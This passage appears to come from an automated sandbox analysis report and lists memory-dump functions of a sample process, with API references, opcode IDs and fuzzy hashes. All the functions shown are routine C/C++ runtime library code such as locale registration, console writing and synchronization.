                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseCreateHandlePointerWrite
                                                                      • String ID:
                                                                      • API String ID: 3604237281-0
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F80CC
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F80D6
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F8127
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F8147
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F8161
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F816B
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F81BC
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F81DC
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F81F6
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F8200
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F8251
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F8271
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F79D0
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F79DA
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F7A2B
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F7A4B
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F7A65
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F7A6F
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F7AC0
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F7AE0
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F7AFA
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F7B04
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F7B55
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F7B75
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: 12aef839abb3c3a779ba027263855640caf1010b9d55bd551895a240cf3121e3
                                                                      • Instruction ID: 4dda120a7107e145322a5a93fd919fafdec1c4dcd0240b96d58d68e252203b02
                                                                      • Opcode Fuzzy Hash: 12aef839abb3c3a779ba027263855640caf1010b9d55bd551895a240cf3121e3
                                                                      • Instruction Fuzzy Hash: D201C07690462D8BCB06EBA4C8466BEB771AF85310F25411AE610AF3D2CF349E028BD4
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F7B8F
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F7B99
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F7BEA
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F7C0A
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: e6bb8a1d20c1ab5cd7985cf16979250fca42b6811689f9f42bdd7b7fb39d7e51
                                                                      • Instruction ID: be97f28593ed3114ea2707b40253aba0c54a08eee0b1296ba84d39e1ab0ea059
                                                                      • Opcode Fuzzy Hash: e6bb8a1d20c1ab5cd7985cf16979250fca42b6811689f9f42bdd7b7fb39d7e51
                                                                      • Instruction Fuzzy Hash: AD01C07590062D9BCF07EBA5D8056BEB761AF84310F24451AE610AB2D2DF749E028BD4
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00403CDB
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00403CE5
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00403D36
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00403D56
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: 190c86a84aecd29ddd2cb1d22f7c9d7ac7e5e7c7c4df9f377b1122196b8c0310
                                                                      • Instruction ID: 99403862bdfa1ec809f09da7f61da0edf4c2fcb5f0a6e33de1a20b7c35c0b18c
                                                                      • Opcode Fuzzy Hash: 190c86a84aecd29ddd2cb1d22f7c9d7ac7e5e7c7c4df9f377b1122196b8c0310
                                                                      • Instruction Fuzzy Hash: 2E01C4759006199FCB06EF64D8457BE7B65AF84310F24452AE511BB3D2CF389E0187D8
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F7F0D
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F7F17
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F7F68
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F7F88
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: 7769cc2acf1af31af745adb4066c14bddfa8e3da2f52155496b7486d697e8f61
                                                                      • Instruction ID: caaf45f4cf36d20527209ef6b44a851625d431d53f6718fb7c2d95de0434e3c0
                                                                      • Opcode Fuzzy Hash: 7769cc2acf1af31af745adb4066c14bddfa8e3da2f52155496b7486d697e8f61
                                                                      • Instruction Fuzzy Hash: 9701D27590462D9BCF06EFA4C9457BEB771AF84310F24451AF610AF2D2DF349E028B84
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F5C6D
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F5C78
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F5CE6
                                                                        • Part of subcall function 003F5DC8: std::locale::_Locimp::_Locimp.LIBCPMT ref: 003F5DE0
                                                                      • std::locale::_Setgloballocale.LIBCPMT ref: 003F5C93
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
                                                                      • String ID:
                                                                      • API String ID: 677527491-0
                                                                      • Opcode ID: 0492060313a700d2d59c75a1dcd133392bb691163c910c0178d000a01ac0df42
                                                                      • Instruction ID: 42768042bbd1dd401b69c08582ad092e93b49b40352d6adec1baed8ba1a18ba1
                                                                      • Opcode Fuzzy Hash: 0492060313a700d2d59c75a1dcd133392bb691163c910c0178d000a01ac0df42
                                                                      • Instruction Fuzzy Hash: 4901B179A01A648BC706FB60D80567D7BA1BFC5740B15401DEA115B382CF786A03CBC9
                                                                      APIs
                                                                      • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00428643,?,00000001,?,?,?,00427788,?,?,00000000), ref: 00428C8D
                                                                      • GetLastError.KERNEL32(?,00428643,?,00000001,?,?,?,00427788,?,?,00000000,?,?,?,00427D0F,?), ref: 00428C99
                                                                        • Part of subcall function 00428C5F: CloseHandle.KERNEL32(FFFFFFFE,00428CA9,?,00428643,?,00000001,?,?,?,00427788,?,?,00000000,?,?), ref: 00428C6F
                                                                      • ___initconout.LIBCMT ref: 00428CA9
                                                                        • Part of subcall function 00428C21: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00428C50,00428630,?,?,00427788,?,?,00000000,?), ref: 00428C34
                                                                      • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00428643,?,00000001,?,?,?,00427788,?,?,00000000,?), ref: 00428CBE
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                      • String ID:
                                                                      • API String ID: 2744216297-0
                                                                      • Opcode ID: 42325f89df925bd9c1fa98412f56af35fd26dbfacb7c35fe74cc164c57004cef
                                                                      • Instruction ID: 8ae8611faa65d1ee9f418b7d0ffd7e3067f00d75883292946002dc4ab6281d02
                                                                      • Opcode Fuzzy Hash: 42325f89df925bd9c1fa98412f56af35fd26dbfacb7c35fe74cc164c57004cef
                                                                      • Instruction Fuzzy Hash: CAF01236602165BBCF262F92EC0499E3F66FF097A1F504429FA1995231DF31C921DB98
                                                                      APIs
                                                                      • SleepConditionVariableCS.KERNELBASE(?,0040789A,00000064), ref: 00407920
                                                                      • LeaveCriticalSection.KERNEL32(00444AF8,?,?,0040789A,00000064,?,?,003E25B6,0044571C,755CD0F6,?,00000000,004293ED,000000FF,?,003E1A26), ref: 0040792A
                                                                      • WaitForSingleObjectEx.KERNEL32(?,00000000,?,0040789A,00000064,?,?,003E25B6,0044571C,755CD0F6,?,00000000,004293ED,000000FF,?,003E1A26), ref: 0040793B
                                                                      • EnterCriticalSection.KERNEL32(00444AF8,?,0040789A,00000064,?,?,003E25B6,0044571C,755CD0F6,?,00000000,004293ED,000000FF,?,003E1A26), ref: 00407942
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                      • String ID:
                                                                      • API String ID: 3269011525-0
                                                                      • Opcode ID: a33dc497978db0a78e6668e7237b82fc2ccf7c26be946b430ca494877b22873a
                                                                      • Instruction ID: 68747c4110e8fa7e3f072300d8b2b7eac0083cc636511242de60eccdd6146cc2
                                                                      • Opcode Fuzzy Hash: a33dc497978db0a78e6668e7237b82fc2ccf7c26be946b430ca494877b22873a
                                                                      • Instruction Fuzzy Hash: 42E09235F85624EBD7212B50EC09F9D3F14EB45755B514032F50572170CBB458028BEE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: p0D$p0D
                                                                      • API String ID: 0-224073010
                                                                      • Opcode ID: 299178b718dded120cbb0d0875b8f06ea10c203b902fda0b5cc29cb2c74ed3ef
                                                                      • Instruction ID: ce5aa8f753f6b5d4a41e67969faef2ef6b9a0dfc326b809da7fb2d0661fa303d
                                                                      • Opcode Fuzzy Hash: 299178b718dded120cbb0d0875b8f06ea10c203b902fda0b5cc29cb2c74ed3ef
                                                                      • Instruction Fuzzy Hash: D2C146B1E40214BBDB20DBA8DD42FEFB7F8AF08704F540166FE05EB282E67499459794
                                                                      APIs
                                                                      • __startOneArgErrorHandling.LIBCMT ref: 0041712D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorHandling__start
                                                                      • String ID: pow
                                                                      • API String ID: 3213639722-2276729525
                                                                      • Opcode ID: ff11a3993ad0dc6aa6f893144390e9602d43c5f40452708f15561dc029e124c8
                                                                      • Instruction ID: eb9da57fd858225a18aeac309c344f66c00cc1d1a9ae97665f0daa8edc256873
                                                                      • Opcode Fuzzy Hash: ff11a3993ad0dc6aa6f893144390e9602d43c5f40452708f15561dc029e124c8
                                                                      • Instruction Fuzzy Hash: 10516EB1A1C206A6CB157724DA413EB7BB09B41740F208D7BF4D5423A5EB3C8CDB9A4E
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: __aulldiv
                                                                      • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                      • API String ID: 3732870572-1956417402
                                                                      • Opcode ID: 705d3debf1a5dddd72039d855a1dd46f71d8830a331db34451873cc4cbbbbbdd
                                                                      • Instruction ID: 759285b87f5f25321c4f1997ad331d3ca6cfb8e0767ee5f51ca79aaa6ddf3071
                                                                      • Opcode Fuzzy Hash: 705d3debf1a5dddd72039d855a1dd46f71d8830a331db34451873cc4cbbbbbdd
                                                                      • Instruction Fuzzy Hash: 5B51C270B082599ADB259F6988507BFBBB6AF45310F16407FE4C2B7381C27C89528B58
                                                                      APIs
                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 003EFA3E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Concurrency::cancel_current_task
                                                                      • String ID: false$true
                                                                      • API String ID: 118556049-2658103896
                                                                      • Opcode ID: 8fb9e53b79602db719e933bfc5e54682f4f82e8969bb99f9f8c24cfc82215226
                                                                      • Instruction ID: f4ddfaaad996ecdee2a3089c61a5490319e2ff1c672a5fb38075ef6db3ce7d22
                                                                      • Opcode Fuzzy Hash: 8fb9e53b79602db719e933bfc5e54682f4f82e8969bb99f9f8c24cfc82215226
                                                                      • Instruction Fuzzy Hash: 8C5109B1D00358DFDB11DFA4C841BEEB7B8FF09304F14822AE845AB282E774A945CB91
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 004022B1
                                                                      • _swprintf.LIBCMT ref: 00402329
                                                                        • Part of subcall function 003F780A: __EH_prolog3.LIBCMT ref: 003F7811
                                                                        • Part of subcall function 003F780A: std::_Lockit::_Lockit.LIBCPMT ref: 003F781B
                                                                        • Part of subcall function 003F780A: std::_Lockit::~_Lockit.LIBCPMT ref: 003F788C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$H_prolog3H_prolog3_Lockit::_Lockit::~__swprintf
                                                                      • String ID: %.0Lf
                                                                      • API String ID: 2348759532-1402515088
                                                                      • Opcode ID: 8456d65d31e660a99e60c7db0ecb886cabd7ddc1a7bcff9336b8e8d4d8030744
                                                                      • Instruction ID: 947038cec30a964f0908d055f1a4cbcf24af065b7fa75c835fcb44342fdce0a1
                                                                      • Opcode Fuzzy Hash: 8456d65d31e660a99e60c7db0ecb886cabd7ddc1a7bcff9336b8e8d4d8030744
                                                                      • Instruction Fuzzy Hash: 7C517C71D00219ABCF05DFE4D948ADDBBB9FF08300F20456AE506AB2A5DB789905CF54
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 00402595
                                                                      • _swprintf.LIBCMT ref: 0040260D
                                                                        • Part of subcall function 003EB500: std::_Lockit::_Lockit.LIBCPMT ref: 003EB52D
                                                                        • Part of subcall function 003EB500: std::_Lockit::_Lockit.LIBCPMT ref: 003EB550
                                                                        • Part of subcall function 003EB500: std::_Lockit::~_Lockit.LIBCPMT ref: 003EB578
                                                                        • Part of subcall function 003EB500: std::_Lockit::~_Lockit.LIBCPMT ref: 003EB617
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                      • String ID: %.0Lf
                                                                      • API String ID: 1487807907-1402515088
                                                                      • Opcode ID: 1db3f7eae31a433768aa36faa9ac36169132749b83e21ca4e83a98c23bf9ba58
                                                                      • Instruction ID: 3692285579ad709abba0ac2bf5b9aa475cd3754b43ed4767a272b3c570d024b4
                                                                      • Opcode Fuzzy Hash: 1db3f7eae31a433768aa36faa9ac36169132749b83e21ca4e83a98c23bf9ba58
                                                                      • Instruction Fuzzy Hash: 6F517C71D00258ABCF06DFE4D948ADEBBB9FF08300F20456AE542AB2D1DB789905CF94
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 0040660E
                                                                      • _swprintf.LIBCMT ref: 00406686
                                                                        • Part of subcall function 003EC590: std::_Lockit::_Lockit.LIBCPMT ref: 003EC5BD
                                                                        • Part of subcall function 003EC590: std::_Lockit::_Lockit.LIBCPMT ref: 003EC5E0
                                                                        • Part of subcall function 003EC590: std::_Lockit::~_Lockit.LIBCPMT ref: 003EC608
                                                                        • Part of subcall function 003EC590: std::_Lockit::~_Lockit.LIBCPMT ref: 003EC6A7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
